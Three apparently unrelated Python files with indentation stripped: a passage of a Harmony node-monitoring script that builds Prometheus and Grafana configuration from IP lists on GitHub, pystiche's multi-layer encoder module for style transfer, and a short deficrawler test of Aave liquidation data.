"-H 'Accept: application/vnd.github.v3.raw' -o ips/{mode}/dns.shard{shard_index}.txt " \
"{path}".format(token=git_token, shard_index=index, path=url_path, mode=mode)
shcmd(cmd)
# download list of EXP IP from shard
for index in range(shard_count):
url_path = "https://raw.githubusercontent.com/harmony-one/nodedb/" \
"master/{github_dir}/shard{shard_index}exp.txt".format(shard_index=index, github_dir=github_dir)
cmd = "curl -H 'Authorization: token {token}' " \
"-H 'Accept: application/vnd.github.v3.raw' -o ips/{mode}/exp.shard{shard_index}.txt " \
"{path}".format(token=git_token, shard_index=index, path=url_path, mode=mode)
shcmd(cmd)
# download list of services
for service in service_list:
url_path = "https://raw.githubusercontent.com/harmony-one/nodedb/" \
"master/{github_dir}/services/{service_name}.txt".format(service_name=service,
github_dir=github_dir)
cmd = "curl -H 'Authorization: token {token}' " \
"-H 'Accept: application/vnd.github.v3.raw' -o ips/{mode}/services/{service_name}.txt " \
"{path}".format(token=git_token, service_name=service, path=url_path, mode=mode)
shcmd(cmd)
# download list of DO node
url_path = "https://raw.githubusercontent.com/harmony-one/nodedb/" \
"master/mainnet/shard/do.{mode}.nodes.txt"
cmd = "curl -H 'Authorization: token {token}' " \
"-H 'Accept: application/vnd.github.v3.raw' -o ips/{mode}/do.{mode}.nodes.txt " \
"{path}".format(token=git_token, path=url_path, mode=mode)
shcmd(cmd)
def load_file_to_json(json_file):
with open(json_file) as f_db_shard:
return json.load(f_db_shard)
def load_file_to_yaml(yaml_file):
with open(yaml_file) as f_db_shard:
return yaml.load(f_db_shard, Loader=yaml.FullLoader)
def load_file_to_array(txt_file):
ip_array = []
with open(txt_file) as f_file:
for line in f_file:
ip_array.append(line.rstrip())
return ip_array
def load_file_split_to_array(txt_file):
ip_array = []
with open(txt_file) as f_file:
for line in f_file:
ip_array.extend(line.rstrip().split(" "))
return ip_array
# create grafana whole config file for network node
def create_network_node_grafana_config(mode, category, dict_ip_array, dict_dns_ip_array,
shard_dashboard_template_json, dict_part_temp_json):
dict_shard_dashboard_json = {}
# create network nodes
for ind in range(shard_count):
ip_array = {"dns": [], "node": []}
ip_created = []
if mode == "mainnet":
# load dns and exp ip list
ip_array["dns"] = dict_dns_ip_array.get(ind)
all_ip_array = dict_ip_array.get(ind)
for ip in all_ip_array:
if ip in ip_array["dns"]:
continue
else:
ip_array["node"].append(ip)
else:
ip_array["node"] = dict_ip_array.get(ind)
# special job name
if mode == "test":
job_name = "shard0_mainnet"
else:
job_name = "shard{shard_index}_{mode}".format(shard_index=ind, mode=mode)
shard_dashboard_json = copy.deepcopy(shard_dashboard_template_json)
# modify dashboard uid
shard_dashboard_json["uid"] = "{mode}_shard{shard_index}_{category}".format(mode=mode, shard_index=ind,
category=category)
# modify dashboard title
shard_dashboard_json["title"] = "{mode} - {category} - SHARD {shard_index}".format(
mode=mode.upper(), category=category.upper(), shard_index=ind)
# modify global stat
shard_dashboard_json["panels"][2]["targets"][0].update(
{"expr": "count(up{{job=\"{shard}\"}}==1)".format(shard=job_name)})
shard_dashboard_json["panels"][3]["targets"][0].update(
{"expr": "up{{job=\"{shard}\"}}==0".format(shard=job_name)})
shard_dashboard_json["panels"][3]["targets"][1].update(
{"expr": "count(up{{job=\"{shard}\"}}==0)".format(shard=job_name)})
id_0 = 10
y_point = 10
for node_type in ip_array:
ips = ip_array[node_type]
# skip the empty node set
if not len(ips):
continue
# add row panel
id_0 += 2
row_panel = {
"collapsed": True,
"datasource": "null",
"gridPos": {"h": 1, "w": 24, "x": 0, "y": y_point},
"id": id_0,
"panels": [],
"title": node_type.upper(),
"type": "row"
}
y_point += 1
ips_size = len(ips)
for idx in range(ips_size):
ip = ips[idx].rstrip()
if ip == "" or ip in ip_created:
continue
if category == "base":
for part_index in range(4):
id_0 += 2
x_point = part_index * 6
# create panel for base metric
data_part_json = create_grafana_base_panel_config(mode, ind, ip, part_index, job_name,
dict_part_temp_json)
data_part_json.update({"gridPos": {'h': 6, 'w': 6, 'x': x_point, 'y': y_point},
"id": id_0
})
# insert this chart to dashboard.panels
row_panel["panels"].append(data_part_json)
elif category == "network":
for part_index in range(2):
id_0 += 2
x_point = part_index * 12
# create panel for network metric
data_part_json = create_grafana_network_panel_config(mode, ind, ip, part_index, job_name,
dict_part_temp_json)
data_part_json.update({"gridPos": {'h': 6, 'w': 12, 'x': x_point, 'y': y_point},
"id": id_0
})
# insert this chart to dashboard.panels
row_panel["panels"].append(data_part_json)
y_point += 6
# record created ip to avoid create duplicate
ip_created.append(ip)
if node_type == "dns":
# auto collapse row for dns
row_panel_child = row_panel["panels"]
row_panel["panels"] = []
row_panel["collapsed"] = False
shard_dashboard_json["panels"].append(row_panel)
shard_dashboard_json["panels"].extend(row_panel_child)
else:
shard_dashboard_json["panels"].append(row_panel)
dict_shard_dashboard_json[ind] = shard_dashboard_json
return dict_shard_dashboard_json
# create grafana whole config file for service node
def create_service_grafana_config(mode, category, dict_service_ip_array,
service_dashboard_template_json, dict_part_temp_json):
job_name = "service_{mode}".format(mode=mode)
service_dashboard_json = copy.deepcopy(service_dashboard_template_json)
# modify dashboard uid
service_dashboard_json["uid"] = "{mode}_service_{category}".format(mode=mode, category=category)
# modify dashboard title
service_dashboard_json["title"] = "{mode} - {category} - SERVICE".format(
mode=mode.upper(), category=category.upper())
# modify global stat
service_dashboard_json["panels"][2]["targets"][0].update(
{"expr": "count(up{{job=\"{job_name}\"}}==1)".format(job_name=job_name)})
service_dashboard_json["panels"][3]["targets"][0].update(
{"expr": "up{{job=\"{job_name}\"}}==0".format(job_name=job_name)})
service_dashboard_json["panels"][3]["targets"][1].update(
{"expr": "count(up{{job=\"{job_name}\"}}==0)".format(job_name=job_name)})
id_0 = 10
y_point = 10
ip_created = []
for node_type in dict_service_ip_array:
ips = dict_service_ip_array[node_type]
# skip the empty node set
if not len(ips):
continue
# add row panel
id_0 += 2
row_panel = {
"collapsed": True,
"datasource": "null",
"gridPos": {"h": 1, "w": 24, "x": 0, "y": y_point},
"id": id_0,
"panels": [],
"title": node_type.upper(),
"type": "row"
}
y_point += 1
ips_size = len(ips)
for idx in range(ips_size):
ip = ips[idx].rstrip()
if ip == "" or ip in ip_created:
continue
if category == "base":
for part_index in range(4):
id_0 += 2
x_point = part_index * 6
# create panel for base metric
data_part_json = create_grafana_base_panel_config(mode, "service", ip, part_index, job_name,
dict_part_temp_json)
data_part_json.update({"gridPos": {'h': 6, 'w': 6, 'x': x_point, 'y': y_point},
"id": id_0
})
# insert this chart to dashboard.panels
row_panel["panels"].append(data_part_json)
elif category == "network":
for part_index in range(2):
id_0 += 2
x_point = part_index * 12
# create panel for network metric
data_part_json = create_grafana_network_panel_config(mode, "service", ip, part_index, job_name,
dict_part_temp_json)
data_part_json.update({"gridPos": {'h': 6, 'w': 12, 'x': x_point, 'y': y_point},
"id": id_0
})
# insert this chart to dashboard.panels
row_panel["panels"].append(data_part_json)
y_point += 6
# record created ip to avoid create duplicate
ip_created.append(ip)
if node_type == "bridge":
# auto collapse row for bridge
row_panel_child = row_panel["panels"]
row_panel["panels"] = []
row_panel["collapsed"] = False
service_dashboard_json["panels"].append(row_panel)
service_dashboard_json["panels"].extend(row_panel_child)
else:
service_dashboard_json["panels"].append(row_panel)
return service_dashboard_json
# create grafana base metric config file
def create_grafana_base_panel_config(mode, ind, ip, part_index, job_name, dict_part_temp_json):
data_part_json = {}
title_chart = ""
# FIRST COLUMN - CPU Monitoring
if part_index == 0:
# load cpu metric template
data_part_json = copy.deepcopy(dict_part_temp_json["cpu"])
# add an alert for CPU
if ind == "service":
data_part_json["alert"][
"message"] = "the cpu usage rate of the {mode} service node({ip}) is abnormal".format(
mode=mode, ip=ip)
else:
data_part_json["alert"][
"message"] = "the cpu usage rate of the {mode} shard{shard_index} node({ip}) is abnormal".format(
mode=mode, shard_index=ind, ip=ip)
        # alert notifications are only needed on mainnet
if mode not in ["mainnet"]:
data_part_json["alert"]["notifications"] = []
cpu_query = "100 - (avg by (instance) (irate(node_cpu_seconds_total{{instance=\"{ip}:9100\", job=\"{job_name}\",mode=\"idle\"}}[5m])) * 100)".format(
ip=ip, job_name=job_name)
title_chart = "CPU UTILIZATION - "
data_part_json["targets"][0].update({"expr": cpu_query})
# SECOND COLUMN - RAM Monitoring
elif part_index == 1:
# load ram metric template
data_part_json = copy.deepcopy(dict_part_temp_json["ram"])
# add an alert for Memory
if ind == "service":
data_part_json["alert"][
"message"] = "the memory usage rate of the {mode} service node({ip}) is abnormal".format(
mode=mode, ip=ip)
else:
data_part_json["alert"][
"message"] = "the memory usage rate of the {mode} shard{shard_index} node({ip}) is abnormal".format(
mode=mode, shard_index=ind, ip=ip)
        # alert notifications are only needed on mainnet
if mode not in ["mainnet"]:
data_part_json["alert"]["notifications"] = []
ram_query = "(node_memory_MemTotal_bytes{{instance=\"{ip}:9100\",job=\"{job_name}\"}} - node_memory_" \
"MemFree_bytes{{instance=\"{ip}:9100\",job=\"{job_name}\"}}) / node_memory_MemTotal_" \
"bytes{{instance=\"{ip}:9100\",job=\"{job_name}\"}} * 100".format(ip=ip, job_name=job_name)
ram_actual_usage_query = "(node_memory_MemTotal_bytes{{instance=\"{ip}:9100\",job=\"{job_name}\"}} - node_memory_" \
"MemAvailable_bytes{{instance=\"{ip}:9100\",job=\"{job_name}\"}}) * 100 / node_memory_" \
"MemTotal_bytes{{instance=\"{ip}:9100\",job=\"{job_name}\"}}".format(ip=ip,
job_name=job_name)
title_chart = "MEMORY - "
data_part_json["targets"][0].update({"expr": ram_query})
data_part_json["targets"][1].update({"expr": ram_actual_usage_query})
# THIRD COLUMN - DISK Monitoring
elif part_index == 2:
# load disk metric template
data_part_json = copy.deepcopy(dict_part_temp_json["disk"])
# add an alert for storage
if ind == "service":
data_part_json["alert"][
"message"] = "the free space of the {mode} service node({ip}) abnormal".format(
mode=mode, ip=ip)
else:
data_part_json["alert"][
"message"] = "the free space of the {mode} shard{shard_index} node({ip}) abnormal".format(
mode=mode, shard_index=ind, ip=ip)
        # alert notifications are only needed on mainnet
if mode not in ["mainnet"]:
data_part_json["alert"]["notifications"] = []
# disk_query = "node_filesystem_avail_bytes{{instance=\"{ip}:9100\", job=\"{job_name}\", mountpoint=\"/\"}}/1024/1024/1024"
if ip in do_node_ips:
disk_query = "(1-(node_filesystem_avail_bytes{{instance=\"{ip}:9100\", job=\"{job_name}\", " \
"device=\"/dev/sda\", fstype=~\"ext4|xfs\"}} / node_filesystem_size_bytes{{instance=\"{ip}:9100\", " \
"job=\"{job_name}\", device=\"/dev/sda\", fstype=~\"ext4|xfs\"}} )) * 100".format(ip=ip,
job_name=job_name)
else:
disk_query = "(1-(node_filesystem_avail_bytes{{instance=\"{ip}:9100\", job=\"{job_name}\", " \
"fstype=~\"ext4|xfs\"}} / node_filesystem_size_bytes{{instance=\"{ip}:9100\", " \
"job=\"{job_name}\", fstype=~\"ext4|xfs\"}} )) * 100".format(ip=ip, job_name=job_name)
title_chart = "DISK SPACE - "
data_part_json["targets"][0].update({"expr": disk_query})
# FOURTH COLUMN - DISK IO Monitoring
elif part_index == 3:
# load io metric template
data_part_json = copy.deepcopy(dict_part_temp_json["io"])
io_read_query = "irate(node_disk_reads_completed_total{{instance=\"{ip}:9100\", job=\"{job_name}\"}}[5m])".format(
ip=ip, job_name=job_name)
io_write_query = "irate(node_disk_writes_completed_total{{instance=\"{ip}:9100\", job=\"{job_name}\"}}[5m])".format(
ip=ip, job_name=job_name)
title_chart = "DISK IO - "
data_part_json["targets"][0].update({"expr": io_read_query})
data_part_json["targets"][1].update({"expr": io_write_query})
else:
pass
# set panel title
data_part_json["title"] = title_chart + ip
return data_part_json
# create grafana network metric config file
def create_grafana_network_panel_config(mode, ind, ip, part_index, shard, dict_part_temp_json):
data_part_json = {}
title_chart = ""
# FIRST COLUMN - NETWORK Monitoring
if part_index == 0:
# load net metric template
data_part_json = copy.deepcopy(dict_part_temp_json["net"])
# add an alert for network traffic
if ind == "service":
data_part_json["alert"][
"message"] = "the network traffic of the {mode} service node({ip}) is abnormal".format(
mode=mode, ip=ip)
else:
data_part_json["alert"][
"message"] = "the network traffic of the {mode} shard{shard_index} node({ip}) is abnormal".format(
mode=mode, shard_index=ind, ip=ip)
        # alert notifications are only needed on mainnet
if mode not in ["mainnet"]:
data_part_json["alert"]["notifications"] = []
network_incoming_query = "rate(node_network_receive_bytes_total{{instance" \
"=\"{ip}:9100\", job=\"{shard}\", device=\"eth0\"}}[5m]) / 1024".format(ip=ip,
shard=shard)
network_outgoing_query = "rate(node_network_transmit_bytes_total{{instance" \
"=\"{ip}:9100\", job=\"{shard}\", device=\"eth0\"}}[5m]) / 1024".format(ip=ip,
shard=shard)
title_chart = "NETWORK TRAFFIC - "
data_part_json["targets"][0].update({"expr": network_incoming_query})
data_part_json["targets"][1].update({"expr": network_outgoing_query})
    # SECOND COLUMN - TCP Monitoring
elif part_index == 1:
# load tcp metric template
data_part_json = copy.deepcopy(dict_part_temp_json["tcp"])
tcp_alloc = "node_sockstat_TCP_alloc{{instance=\"{ip}:9100\",job=\"{shard}\"}}".format(ip=ip, shard=shard)
tcp_inuse = "node_sockstat_TCP_inuse{{instance=\"{ip}:9100\",job=\"{shard}\"}}".format(ip=ip, shard=shard)
tcp_mem = "node_sockstat_TCP_mem{{instance=\"{ip}:9100\",job=\"{shard}\"}}".format(ip=ip, shard=shard)
title_chart = "TCP SOCK - "
data_part_json["targets"][0].update({"expr": tcp_alloc})
data_part_json["targets"][1].update({"expr": tcp_inuse})
data_part_json["targets"][2].update({"expr": tcp_mem})
else:
pass
# set panel title
data_part_json["title"] = title_chart + ip
return data_part_json
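# With ip="10.0.0.1" and shard="shard0_mainnet" (illustrative values only), the incoming
# traffic expression built above renders to:
#   rate(node_network_receive_bytes_total{instance="10.0.0.1:9100", job="shard0_mainnet", device="eth0"}[5m]) / 1024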
# create prometheus whole config file
def create_prometheus_config(mode, dict_ip_array, dict_service_ip_array, config_template):
total_config_part_count = len(config_template["scrape_configs"])
# create network nodes
for ind in range(shard_count):
# find config part index
job_name = "shard{shard_index}_{mode}".format(shard_index=ind, mode=mode)
for part_index in range(total_config_part_count):
if job_name == config_template["scrape_configs"][part_index]["job_name"]:
ip_array = dict_ip_array.get(ind)
ip_array_size = len(ip_array)
targets = []
for idx in range(ip_array_size):
ip = ip_array[idx].rstrip()
if ip == "":
continue
targets.append(ip + ":9100")
config_template["scrape_configs"][part_index]["scrape_interval"] = str(prometheus_scrape_interval) + "s"
config_template["scrape_configs"][part_index]["static_configs"][0]["targets"] = targets
break
# create service nodes
if mode == "mainnet":
service_ips = []
for service_name in service_list:
ip_array = dict_service_ip_array.get(service_name)
ip_array_size = len(ip_array)
for idx in range(ip_array_size):
ip = ip_array[idx].rstrip()
if ip == "":
continue
service_ips.append(ip + ":9100")
service_job_name = "service_{mode}".format(mode=mode)
for part_index in range(total_config_part_count):
if service_job_name == config_template["scrape_configs"][part_index]["job_name"]:
config_template["scrape_configs"][part_index]["scrape_interval"] = str(prometheus_scrape_interval) + "s"
config_template["scrape_configs"][part_index]["static_configs"][0]["targets"] = service_ips
break
with open("prometheus/prometheus.yml", 'w') as fp:
yaml.dump(config_template, fp)
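# For reference, each scrape_configs entry written above ends up shaped roughly like the
# following in prometheus.yml (values are illustrative only):
#   - job_name: shard0_mainnet
#     scrape_interval: 30s
#     static_configs:
#       - targets:
#           - 10.0.0.1:9100
#           - 10.0.0.2:9100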
# update prometheus config
def update_prometheus_config():
cmd = "sudo cp prometheus/prometheus.yml /etc/prometheus/prometheus.yml && sudo systemctl restart prometheus"
shcmd(cmd)
# update grafana config
def update_grafana_config(mode, category, dict_shard_dashboard_json, dict_service_dashboard_json, grafana_token):
# update network nodes
for index in range(shard_count):
# get now dashboard version
url = grafana_api_host + "dashboards/uid/{mode}_shard{shard_index}_{category}".format(mode=mode,
shard_index=index,
category=category)
headers = {"Authorization": "Bearer " + grafana_token}
response = requests.get(url, headers=headers).json()
# check new dashboard
if "dashboard" in response:
version = response["dashboard"]["version"]
else:
version = 1
# post new dashboard config
dict_shard_dashboard_json[index]["version"] = version
new_dashboard_config = {
"dashboard": dict_shard_dashboard_json[index],
"folderId": dict_grafana_folder_mode[mode],
"overwrite": False
}
url = grafana_api_host + "dashboards/db"
headers = {"Authorization": "Bearer " + grafana_token, "Content-Type": "application/json"}
response = requests.post(url, data=json.dumps(new_dashboard_config), headers=headers).json()
if response["status"] == "success":
logging.info("update grafana dashboard config success for " + response["uid"])
else:
logging.error("failed to update grafana dashboard config: " + json.dumps(response))
# update service nodes
# get now dashboard version
url = grafana_api_host + "dashboards/uid/{mode}_service_{category}".format(mode=mode, category=category)
headers = {"Authorization": "Bearer " + grafana_token}
response = requests.get(url, headers=headers).json()
# check new dashboard
if "dashboard" in response:
version = response["dashboard"]["version"]
else:
version = 1
# post new dashboard config
dict_service_dashboard_json["version"] = version
new_dashboard_config = {
"dashboard": dict_service_dashboard_json,
"folderId": dict_grafana_folder_mode[mode],
"overwrite": False
}
url = grafana_api_host + "dashboards/db"
headers = {"Authorization": "Bearer " + grafana_token, "Content-Type": "application/json"}
response = requests.post(url, data=json.dumps(new_dashboard_config), headers=headers).json()
if response["status"] == "success":
logging.info("update grafana dashboard config success for " + response["uid"])
else:
logging.error("failed to update grafana dashboard config: " + json.dumps(response))
def main():
global min_storage_space, prometheus_scrape_interval, shard_count, grafana_api_host, max_actual_usage_memory_rate, do_node_ips
logging.basicConfig(level=10, format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')
# get config by .env file
load_dotenv(find_dotenv())
min_storage_space = os.getenv("MIN_STORAGE_SPACE")
max_actual_usage_memory_rate = os.getenv("MAX_ACTUAL_USAGE_MEMORY_RATE")
prometheus_scrape_interval = os.getenv("PROMETHEUS_SCRAPE_INTERVAL")
# get private github token
git_token = os.getenv("GIT_TOKEN")
# get grafana api token
grafana_token = os.getenv("GRAFANA_TOKEN")
grafana_api_host = os.getenv("GRAFANA_API_HOST")
if git_token == "" or grafana_token == "":
raise RuntimeError("need to set token")
# load grafana metric template files
dict_part_temp_json = {
"cpu": load_file_to_json("grafana_template/cpu_template.json"),
"ram": load_file_to_json("grafana_template/ram_template.json"),
"disk": load_file_to_json("grafana_template/disk_space_template.json"),
"io": load_file_to_json("grafana_template/disk_io_count_template.json"),
"net": load_file_to_json("grafana_template/net_traffic_template.json"),
"tcp": load_file_to_json("grafana_template/net_sock_tcp_template.json"),
}
# get script run mode
parser = argparse.ArgumentParser()
    parser.add_argument('-m', type=str, help="select run mode: all, mainnet, testnet or test.")
args = parser.parse_args()
if args.m not in ["all", "mainnet", "testnet", "test"]:
raise RuntimeError("need to set correct network mode")
elif args.m == "all":
run_modes = ["mainnet", "testnet"]
else:
run_modes = [args.m]
# update for each mode network
for mode in run_modes:
        # special shard count for the test network
if mode in ["test"]:
shard_count = 1
else:
shard_count = 4
# get latest node ips from github
download_ip_list_from_github(git_token, mode)
logging.info('download ip list success')
dict_ip_array = {}
dict_dns_ip_array = {}
dict_exp_ip_array = {}
dict_service_ip_array = {}
# load grafana dashboard template files
file_path = "grafana_template/dashboard_template.json"
dashboard_template_json = load_file_to_json(file_path)
# load latest node ip files
for index in range(shard_count):
file_path = "ips/{mode}/shard{shard_index}.txt".format(shard_index=index, mode=mode)
dict_ip_array[index] = load_file_to_array(file_path)
if mode == "mainnet":
# load latest dns node ip files
for index in range(shard_count):
file_path = "ips/{mode}/dns.shard{shard_index}.txt".format(shard_index=index, mode=mode)
dict_dns_ip_array[index] = load_file_split_to_array(file_path)
# load latest exp node ip files
for index in range(shard_count):
file_path = "ips/{mode}/exp.shard{shard_index}.txt".format(shard_index=index, mode=mode)
dict_exp_ip_array[index] = load_file_to_array(file_path)
# load service ip files
for service_name in service_list:
file_path = "ips/{mode}/services/{service_name}.txt".format(service_name=service_name, mode=mode)
dict_service_ip_array[service_name] = load_file_to_array(file_path)
# load DO node
file_path = "ips/mainnet/do.mainnet.nodes.txt"
do_node_ips = load_file_to_array(file_path)
# load prometheus config template
if os.path.exists("prometheus/prometheus.yml"):
prometheus_config_template = load_file_to_yaml("prometheus/prometheus.yml")
else:
prometheus_config_template = load_file_to_yaml("prometheus_template/prometheus.yml")
# create prometheus whole config file
create_prometheus_config(mode, dict_ip_array, dict_service_ip_array, prometheus_config_template)
logging.info('create prometheus config success')
for category in ["base", "network"]:
# create grafana whole config file
dict_shard_dashboard_json = create_network_node_grafana_config(mode, category, dict_ip_array,
dict_dns_ip_array,
dashboard_template_json,
dict_part_temp_json)
dict_service_dashboard_json = create_service_grafana_config(mode, category, dict_service_ip_array,
dashboard_template_json,
dict_part_temp_json)
logging.info('create network and service node grafana config success')
# update grafana config
update_grafana_config(mode, category, dict_shard_dashboard_json, dict_service_dashboard_json, grafana_token)
logging.info('update grafana config success')
# update prometheus config and restart service
update_prometheus_config()
logging.info('update prometheus config success')
if __name__ == "__main__":
main()
|
457435
|
import warnings
from collections import OrderedDict, defaultdict
from typing import (
Any,
Callable,
Collection,
DefaultDict,
Dict,
Iterable,
List,
Optional,
Sequence,
Set,
Tuple,
cast,
)
import torch
from torch import nn
import pystiche
from ..misc import build_deprecation_message
from .encoder import Encoder
from .guides import propagate_guide
__all__ = ["MultiLayerEncoder", "SingleLayerEncoder"]
class _Layers:
def __init__(self, modules: Dict[str, nn.Module]) -> None:
self._modules = modules
def __contains__(self, name: str) -> bool:
return name in self._modules
def __len__(self) -> int:
return len(self._modules)
@property
def _names(self) -> Tuple[str, ...]:
# TODO: Check if tuple generation is expensive. If that is the case, cache it
# based on self._modules.keys()
return tuple(self._modules.keys())
def _name_to_idx(self, name: str) -> int:
if name not in self:
raise ValueError
return self._names.index(name)
def _idx_to_name(self, idx: int) -> str:
if not (0 <= idx < len(self)):
raise ValueError
return self._names[idx]
def range(
self,
start: Optional[str] = None,
stop: Optional[str] = None,
include_start: bool = True,
include_stop: bool = True,
) -> Tuple[str, ...]:
if not (start or stop):
return self._names
if start is None:
start_idx = 0
else:
start_idx = self._name_to_idx(start)
if not include_start:
start_idx += 1
if stop is None:
stop_idx = len(self)
else:
stop_idx = self._name_to_idx(stop)
if include_stop:
stop_idx += 1
return self._names[start_idx:stop_idx]
def _depth(
self, names: Iterable[str], extractor: Callable[[List[int]], int]
) -> str:
return self._idx_to_name(extractor([self._name_to_idx(name) for name in names]))
def shallowest(self, names: Optional[Iterable[str]] = None) -> str:
return self._depth(names or self._names, min)
def deepest(self, names: Optional[Iterable[str]] = None) -> str:
return self._depth(names or self._names, max)
def _neighbour(
self,
name: str,
names: Iterable[str],
edge_idx: int,
extractor: Callable[[int, List[int]], Optional[str]],
) -> Optional[str]:
if not names:
return None
idx = self._name_to_idx(name)
idcs = [self._name_to_idx(name) for name in names]
if edge_idx in idcs:
return self._idx_to_name(edge_idx)
return extractor(idx, idcs)
def _extract_prev(self, idx: int, idcs: List[int]) -> Optional[str]:
candidates = [other_idx for other_idx in idcs if other_idx < idx]
if not candidates:
return None
return self._idx_to_name(max(candidates))
def prev(self, name: str, names: Iterable[str]) -> Optional[str]:
return self._neighbour(name, names, edge_idx=0, extractor=self._extract_prev)
def _extract_next(self, idx: int, idcs: List[int]) -> Optional[str]:
candidates = [other_idx for other_idx in idcs if other_idx > idx]
if not candidates:
return None
return self._idx_to_name(min(candidates))
def next(self, name: str, names: Collection[str]) -> Optional[str]:
return self._neighbour(
name, names, edge_idx=len(self) - 1, extractor=self._extract_next
)
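# A small sketch of how _Layers navigates the ordered module names (layer names below are
# hypothetical and an insertion-ordered dict is assumed):
#
#   layers = _Layers({"conv": nn.Conv2d(3, 3, 3), "relu": nn.ReLU(), "pool": nn.MaxPool2d(2)})
#   layers.range("conv", "pool")         # ("conv", "relu", "pool")
#   layers.range(stop="relu")            # ("conv", "relu")
#   layers.deepest(("conv", "relu"))     # "relu"
#   layers.shallowest(("relu", "pool"))  # "relu"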
class MultiLayerEncoder(pystiche.Module):
r"""Sequential encoder with convenient access to intermediate layers.
Args:
modules: Named modules that serve as basis for the encoding.
Attributes:
registered_layers: Layers, on which the encodings will be cached during the
:meth:`forward` pass.
"""
_modules: Dict[str, nn.Module] # type: ignore[assignment]
def __init__(self, modules: Sequence[Tuple[str, nn.Module]]) -> None:
super().__init__(named_children=modules)
self._layers: _Layers = _Layers(self._modules)
self.registered_layers: Set[str] = set()
self._cache: DefaultDict[torch.Tensor, Dict[str, torch.Tensor]] = defaultdict(
lambda: {}
)
def __contains__(self, layer: str) -> bool:
r"""Is the layer part of the multi-layer encoder?
Args:
layer: Layer to be checked.
"""
return layer in self._layers
def verify(self, layer: str) -> None:
r"""Verifies that a layer is part of the multi-layer encoder.
Args:
layer: Layer to be checked.
Raises:
ValueError: If ``layer`` is not part of the multi-layer encoder.
"""
if layer not in self:
raise ValueError(f"Layer {layer} is not part of {type(self).__name__}().")
def register_layer(self, layer: str) -> None:
r"""Register a layer for caching the encodings in the :meth:`forward` pass.
Args:
layer: Layer to be registered.
"""
self.verify(layer)
self.registered_layers.add(layer)
# FIXME: could this be moved into pystiche.Module?
def __call__(self, *args: Any, **kwargs: Any) -> Any:
r"""Invokes :meth:`forward`."""
return super().__call__(*args, **kwargs)
def forward(
self,
input: torch.Tensor,
layer: Optional[str] = None,
cache: Optional[Dict[str, torch.Tensor]] = None,
to_cache: Optional[Collection[str]] = None,
) -> torch.Tensor:
r"""Encode the input.
Args:
input: Input to be encoded.
layer: Layer on which the ``input`` should be encoded. If omitted, defaults
to the last layer in the multi-layer encoder.
            cache: Encoding cache. If omitted, defaults to the internal cache.
to_cache: Layers, of which the encodings should be cached. If omitted,
defaults to :attr:`registered_layers`.
Examples:
>>> modules = [("conv", nn.Conv2d(3, 3, 3)), ("pool", nn.MaxPool2d(2))]
>>> mle = pystiche.enc.MultiLayerEncoder(modules)
>>> input = torch.rand(1, 3, 128, 128)
>>> output = mle(input, "conv")
"""
if layer is None:
layer = tuple(self._modules.keys())[-1]
else:
self.verify(layer)
if cache is None:
cache = self._cache[input]
if input.requires_grad:
input.register_hook(lambda grad: self.clear_cache())
if layer in cache:
return cache[layer]
if to_cache is None:
to_cache = self.registered_layers
prev = self._layers.prev(layer, cache.keys())
if prev is not None:
input = cache[prev]
for name in self._layers.range(prev, layer, include_start=False):
module = self._modules[name]
input = module(input)
if name in to_cache:
cache[name] = input
return input
def clear_cache(self) -> None:
r"""Clear the internal cache."""
self._cache.clear()
def empty_storage(self) -> None:
msg = build_deprecation_message(
"The method 'empty_storage'", "1.0", info="It was renamed to 'clear_cache'."
)
warnings.warn(msg)
self.clear_cache()
def encode(
self, input: torch.Tensor, layers: Sequence[str],
) -> Tuple[torch.Tensor, ...]:
r"""Encode the input on layers.
Args:
input: Input to be encoded.
layers: Layers on which the ``input`` should be encoded.
"""
cache: Dict[str, torch.Tensor] = {}
return tuple(
self(input, layer, cache=cache, to_cache=layers) for layer in layers
)
def propagate_guide(
self,
guide: torch.Tensor,
layers: Sequence[str],
method: str = "simple",
allow_empty: bool = False,
) -> Tuple[torch.Tensor, ...]:
r"""Propagate the guide on the given layers.
Args:
guide: Guide.
layers: Layers.
allow_empty: If ``True``, allow the propagated guides to become empty.
Defaults to ``False``.
Returns:
            Tuple of guides whose order corresponds to ``layers``.
"""
guides = {}
for name in self._layers.range(stop=self._layers.deepest(layers)):
module = self._modules[name]
try:
guide = guides[name] = propagate_guide(
module, guide, method=method, allow_empty=allow_empty
)
except RuntimeError as error:
# TODO: customize error message to better reflect which layer causes
# the problem
raise error
return tuple(guides[name] for name in layers)
def trim(self, layers: Optional[Iterable[str]] = None) -> None:
if layers is None:
layers = self.registered_layers
else:
for name in layers:
self.verify(name)
for name in self._layers.range(
self._layers.deepest(layers), include_start=False
):
del self._modules[name]
def extract_encoder(self, layer: str) -> "SingleLayerEncoder":
r"""Extract a :class:`SingleLayerEncoder` for the layer and register it.
Args:
layer: Layer.
"""
self.register_layer(layer)
return SingleLayerEncoder(self, layer)
class SingleLayerEncoder(Encoder):
r"""Encoder extracted from a :class:`MultiLayerEncoder` that operates on a single
layer. Invokes :meth:`SingleLayerEncoder.forward` if called.
Attributes:
multi_layer_encoder: Corresponding multi-layer encoder.
layer: Encoding layer.
"""
def __init__(self, multi_layer_encoder: MultiLayerEncoder, layer: str):
super().__init__()
self.multi_layer_encoder = multi_layer_encoder
self.layer = layer
def forward(self, input: torch.Tensor) -> torch.Tensor:
r"""Encode the given input on :attr:`SingleLayerEncoder.layer` of
:attr:`SingleLayerEncoder.multi_layer_encoder`.
Args:
            input: Input image.
"""
return cast(torch.Tensor, self.multi_layer_encoder(input, self.layer))
def propagate_guide(self, guide: torch.Tensor) -> torch.Tensor:
r"""Propagate the given guide on :attr:`SingleLayerEncoder.layer` of
:attr:`SingleLayerEncoder.multi_layer_encoder`.
Args:
guide: Guide.
"""
return self.multi_layer_encoder.propagate_guide(guide, layers=(self.layer,))[0]
def __repr__(self) -> str:
name = self.multi_layer_encoder.__class__.__name__
properties = OrderedDict()
properties["layer"] = self.layer
properties.update(self.multi_layer_encoder.properties())
named_children = ()
return self._build_repr(
name=name, properties=properties, named_children=named_children
)
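# A short usage sketch building on the docstring example in forward() above (layer names
# are hypothetical):
#
#   mle = MultiLayerEncoder([("conv", nn.Conv2d(3, 3, 3)), ("pool", nn.MaxPool2d(2))])
#   enc = mle.extract_encoder("conv")        # SingleLayerEncoder bound to "conv"
#   features = enc(torch.rand(1, 3, 32, 32))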
|
457455
|
from deficrawler.lending import Lending
def test_liquidation_aave_2_eth():
aave = Lending(protocol="Aave", chain="Ethereum", version=2)
liquidations = aave.get_data_from_date_range(
'21/04/2021 05:20:01', '22/04/2021 06:22:01', "liquidation")
assert(liquidations[0]['tx_id'] != "")
